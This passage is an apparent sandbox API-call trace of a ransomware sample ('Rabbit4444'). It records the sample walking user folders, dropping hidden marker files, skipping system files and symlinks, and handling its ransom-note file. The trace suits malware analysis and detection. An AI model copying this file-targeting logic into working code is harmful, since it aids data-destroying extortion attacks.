returned="C:\\Windows10Upgrade\\2052\\" [0047.870] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\2052\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3" [0047.870] CreateFileW (lpFileName="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\2052\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.872] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.875] FlushFileBuffers (hFile=0x27c) returned 1 [0047.876] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.876] CloseHandle (hObject=0x27c) returned 1 [0047.877] lstrlenW (lpString="C:\\Windows10Upgrade\\2052") returned 24 [0047.877] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.877] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\2052\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea35483d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea355be9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5da6383, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0047.877] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.877] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.877] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.877] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.877] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea35483d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea355be9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5da6383, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.877] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.877] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.877] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.877] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.877] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.877] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5da6383, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5da6383, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5dcc582, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.877] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.877] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.877] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea355be9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea355be9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x1cec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWINTL20.DLL", cAlternateFileName="")) returned 1 [0047.877] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.877] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.877] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="Rabbit4444.exe") returned -1 [0047.877] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2=".") returned 1 [0047.877] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="..") returned 1 [0047.877] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="windows") returned -1 [0047.877] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="bootmgr") returned 1 [0047.877] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="pagefile.sys") returned -1 [0047.878] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="boot") returned 1 [0047.878] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="ids.txt") returned -1 [0047.878] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="NTUSER.DAT") returned -1 [0047.878] lstrcpyW (in: lpString1=0x130eb6a, lpString2="DWINTL20.DLL" | out: lpString1="DWINTL20.DLL") returned="DWINTL20.DLL" [0047.878] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\2052\\DWINTL20.DLL", dwFileAttributes=0x0) returned 1 [0047.878] lstrlenW (lpString="DWINTL20.DLL") returned 12 [0047.878] lstrlenW (lpString="Rabbit4444") returned 10 [0047.878] lstrcmpiW (lpString1="INTL20.DLL", lpString2="Rabbit4444") returned -1 [0047.878] lstrlenW (lpString=".dll") returned 4 [0047.878] lstrcmpiW (lpString1=".DLL", lpString2=".dll") returned 0 [0047.878] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea355be9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea355be9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x1cec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWINTL20.DLL", cAlternateFileName="")) returned 0 [0047.878] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0047.878] lstrcpyW (in: lpString1=0x130eb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.878] CreateFileW (lpFileName="C:\\Windows10Upgrade\\2052\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\2052\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.879] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.879] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.879] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.879] CloseHandle (hObject=0x278) returned 1 [0047.879] CloseHandle (hObject=0x27c) returned 1 [0047.880] GetCurrentThreadId () returned 0xd98 [0047.880] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf65b0 [0047.880] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users", iMaxLength=2048 | out: lpString1="C:\\Users") returned="C:\\Users" [0047.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0047.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf65a8 | out: hHeap=0xe0000) returned 1 [0047.880] lstrcatW (in: lpString1="", lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0047.880] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0047.880] lstrcatW (in: lpString1="C:\\Users\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\.BFC0E91B00AE8A0620D3" [0047.880] CreateFileW (lpFileName="C:\\Users\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.881] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.884] FlushFileBuffers (hFile=0x27c) returned 1 [0047.885] SetFileAttributesW (lpFileName="C:\\Users\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.885] CloseHandle (hObject=0x27c) returned 1 [0047.886] lstrlenW (lpString="C:\\Users") returned 8 [0047.886] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.886] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe5dcc582, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0047.886] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.886] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.886] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.886] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.886] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe5dcc582, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.886] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.886] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.886] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.886] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.886] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.886] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5dcc582, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5dcc582, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5dcc582, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.886] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.886] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.886] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2="Rabbit4444.exe") returned -1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2=".") returned 1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2="..") returned 1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2="windows") returned -1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2="bootmgr") returned -1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2="pagefile.sys") returned -1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2="boot") returned -1 [0047.886] lstrcmpiW (lpString1="All Users", lpString2="ids.txt") returned -1 [0047.887] lstrcmpiW (lpString1="All Users", lpString2="NTUSER.DAT") returned -1 [0047.887] lstrcpyW (in: lpString1=0x130eb4a, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0047.887] SetFileAttributesW (lpFileName="C:\\Users\\All Users", dwFileAttributes=0x2412) returned 1 [0047.887] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\All Users\r\n") returned 37 [0047.887] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\All Users\r\n") returned 37 [0047.887] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.887] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0047.887] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x25, lpOverlapped=0x0) returned 1 [0047.890] CloseHandle (hObject=0x278) returned 1 [0047.891] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.891] lstrcmpiW (lpString1="Default", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="Rabbit4444.exe") returned -1 [0047.891] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="windows") returned -1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="bootmgr") returned 1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="pagefile.sys") returned -1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="boot") returned 1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="ids.txt") returned -1 [0047.891] lstrcmpiW (lpString1="Default", lpString2="NTUSER.DAT") returned -1 [0047.892] lstrcpyW (in: lpString1=0x130eb4a, lpString2="Default" | out: lpString1="Default") returned="Default" [0047.892] SetFileAttributesW (lpFileName="C:\\Users\\Default", dwFileAttributes=0x12) returned 1 [0047.892] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0047.892] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0047.892] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3" [0047.892] CreateFileW (lpFileName="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.893] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.901] FlushFileBuffers (hFile=0x278) returned 1 [0047.902] SetFileAttributesW (lpFileName="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.903] CloseHandle (hObject=0x278) returned 1 [0047.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf65a8 [0047.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x22) returned 0x10c210 [0047.903] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0xf65b0 | out: ListHead=0xf6750, ListEntry=0xf65b0) returned 0x0 [0047.903] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0047.903] lstrcmpiW (lpString1="Default User", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.903] lstrcmpiW (lpString1="Default User", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.903] lstrcmpiW (lpString1="Default User", lpString2="Rabbit4444.exe") returned -1 [0047.904] lstrcmpiW (lpString1="Default User", lpString2=".") returned 1 [0047.904] lstrcmpiW (lpString1="Default User", lpString2="..") returned 1 [0047.904] lstrcmpiW (lpString1="Default User", lpString2="windows") returned -1 [0047.904] lstrcmpiW (lpString1="Default User", lpString2="bootmgr") returned 1 [0047.904] lstrcmpiW (lpString1="Default User", lpString2="pagefile.sys") returned -1 [0047.904] lstrcmpiW (lpString1="Default User", lpString2="boot") returned 1 [0047.904] lstrcmpiW (lpString1="Default User", lpString2="ids.txt") returned -1 [0047.904] lstrcmpiW (lpString1="Default User", lpString2="NTUSER.DAT") returned -1 [0047.904] lstrcpyW (in: lpString1=0x130eb4a, lpString2="Default User" | out: lpString1="Default User") returned="Default User" [0047.904] SetFileAttributesW (lpFileName="C:\\Users\\Default User", dwFileAttributes=0x2412) returned 1 [0047.904] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default User\r\n") returned 40 [0047.905] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default User\r\n") returned 40 [0047.905] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.905] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4a8 [0047.905] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x28, lpOverlapped=0x0) returned 1 [0047.906] CloseHandle (hObject=0x278) returned 1 [0047.907] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default.migrated", cAlternateFileName="DEFAUL~1.MIG")) returned 1 [0047.907] lstrcmpiW (lpString1="Default.migrated", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2="Rabbit4444.exe") returned -1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2=".") returned 1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2="..") returned 1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2="windows") returned -1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2="bootmgr") returned 1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2="pagefile.sys") returned -1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2="boot") returned 1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2="ids.txt") returned -1 [0047.908] lstrcmpiW (lpString1="Default.migrated", lpString2="NTUSER.DAT") returned -1 [0047.908] lstrcpyW (in: lpString1=0x130eb4a, lpString2="Default.migrated" | out: lpString1="Default.migrated") returned="Default.migrated" [0047.908] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6608 [0047.908] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x34) returned 0x102450 [0047.908] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6610 | out: ListHead=0xf68b0, ListEntry=0xf6610) returned 0xf64d0 [0047.908] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a9bc987, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5f69dfa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5f69dfa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0047.908] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0047.908] lstrcpyW (in: lpString1=0x130eb4a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0047.908] SetFileAttributesW (lpFileName="C:\\Users\\desktop.ini", dwFileAttributes=0x22) returned 1 [0047.909] SetFileAttributesW (lpFileName="C:\\Users\\desktop.ini", dwFileAttributes=0x6) returned 1 [0047.909] lstrlenW (lpString="desktop.ini") returned 11 [0047.909] lstrlenW (lpString="Rabbit4444") returned 10 [0047.909] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0047.909] lstrlenW (lpString=".dll") returned 4 [0047.909] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0047.909] lstrlenW (lpString=".lnk") returned 4 [0047.909] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0047.909] lstrlenW (lpString=".ini") returned 4 [0047.909] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0047.909] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="Rabbit4444.exe") returned -1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2=".") returned 1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="..") returned 1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="windows") returned -1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="bootmgr") returned 1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="pagefile.sys") returned -1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="boot") returned 1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="ids.txt") returned -1 [0047.909] lstrcmpiW (lpString1="FD1HVy", lpString2="NTUSER.DAT") returned -1 [0047.909] lstrcpyW (in: lpString1=0x130eb4a, lpString2="FD1HVy" | out: lpString1="FD1HVy") returned="FD1HVy" [0047.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0047.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x20) returned 